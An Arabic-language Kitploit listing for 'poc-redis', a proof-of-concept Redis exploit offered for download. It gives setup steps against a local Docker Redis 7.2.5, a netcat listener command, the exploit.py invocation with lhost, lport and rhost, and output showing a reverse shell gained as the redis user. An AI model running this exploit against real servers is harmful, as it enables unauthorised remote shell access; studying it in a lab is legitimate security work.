Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
poc-redis — إثبات مفهوم لاستغلال ثغرة أمنية في Redis تقوم بإنشاء قشرة عكسية، مع تعليمات الإعداد لكل من Docker ومستمع netcat. | Kitploit
أدوات/GitHubGitHub/rop4sh/poc-redis
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubrop4sh/poc-redis

poc-redis

إثبات مفهوم لاستغلال ثغرة أمنية في Redis تقوم بإنشاء قشرة عكسية، مع تعليمات الإعداد لكل من Docker ومستمع netcat.

عرض المستودع
1852منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

لتشغيل الاستغلال، يرجى فك ضغط ملف ZIP المرفق واتباع هذه الخطوات على نظام Linux:

  1. قم بإعداد بيئة افتراضية (virtualenv) وتثبيت عميل Redis
root@kitploit:~
$ python3 -m venv .venv
$ source .venv/bin/activate
$ pip install -r requirements.txt
  1. في طرفية أخرى، قم بتشغيل صورة Redis عبر Docker
    • أو قم بالبناء من المصدر وتشغيله على منصة مدعومة
      • تم اختبار الاستغلال ويعمل على Fedora 40/Ubuntu 24.04
root@kitploit:~
$ docker run -p6379:6379 redis:7.2.5
  1. احصل على عنوان IP الخاص بجهازك على شبكة Docker
root@kitploit:~
$ ifconfig
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:53ff:fecc:6e16  prefixlen 64  scopeid 0x20<link>
        ether 02:42:53:cc:6e:16  txqueuelen 0  (Ethernet)
        RX packets 69  bytes 4268 (4.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 133  bytes 269173 (262.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

  1. في طرفية أخرى، قم بتشغيل مستمع netcat:
root@kitploit:~
$ nc -nlvp 2222
  1. قم بتشغيل الاستغلال:
    • استبدل lhost بعنوان IP الخاص بشبكة Docker الخاصة بك
root@kitploit:~
$ python3 exploit.py --lhost 172.17.0.1 --lport 2222 --rhost localhost
  1. يجب أن تستقبل اتصالاً
root@kitploit:~
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:2222
Ncat: Listening on 0.0.0.0:2222
Ncat: Connection from 172.17.0.2:36518.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
redis@4d1537f2dd4e:/data$

تنزيل الأداة